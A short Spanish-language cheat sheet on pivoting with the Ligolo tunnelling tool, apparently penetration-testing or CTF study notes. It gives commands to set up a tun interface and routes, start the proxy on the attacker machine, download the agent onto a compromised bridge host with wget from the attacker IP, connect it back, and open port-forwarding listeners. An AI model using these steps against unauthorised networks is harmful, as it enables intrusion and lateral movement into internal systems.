Ligolo

-------- gracias a @xerosec por la explicación de esta herramienta uwu -------

Preparativos

• Crear interfaz de red modo tunnel

sudo ip tuntap add user $USER mode tun ligolo

# levantamos la interfaz
sudo ip link set ligolo up

• Añadir route hacia el segmento de red objetivo a través del dispositivo de red ligolo

sudo ip route add <segmento/x> dev ligolo

Pivoting

• Activar el proxy en máquina atacante

chmod +x proxy
./proxy -selfcert

• Transferir agent a la máquina puente

cd /tmp
wget http://<IPa>/agent # transferimos agent
chmod +x agent

• Conectar máquina puente a máquina atacante

./agent -connect <IPa>:<ligolo-port> -ignore-cert

• Establecer tunnel desde máquina atacante

session
# seleccionar número sesión en caso de existir varias
start

ping <IP> # comprobamos alcance a tercera máquina

Port Forwarding

• Añadir listener para redirigir flujo de puertos

listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listerner_list

• Ya podríamos usar el puerto de la máquina puente para transferir archivos a nuestra máquina atacante desde la tercera máquina.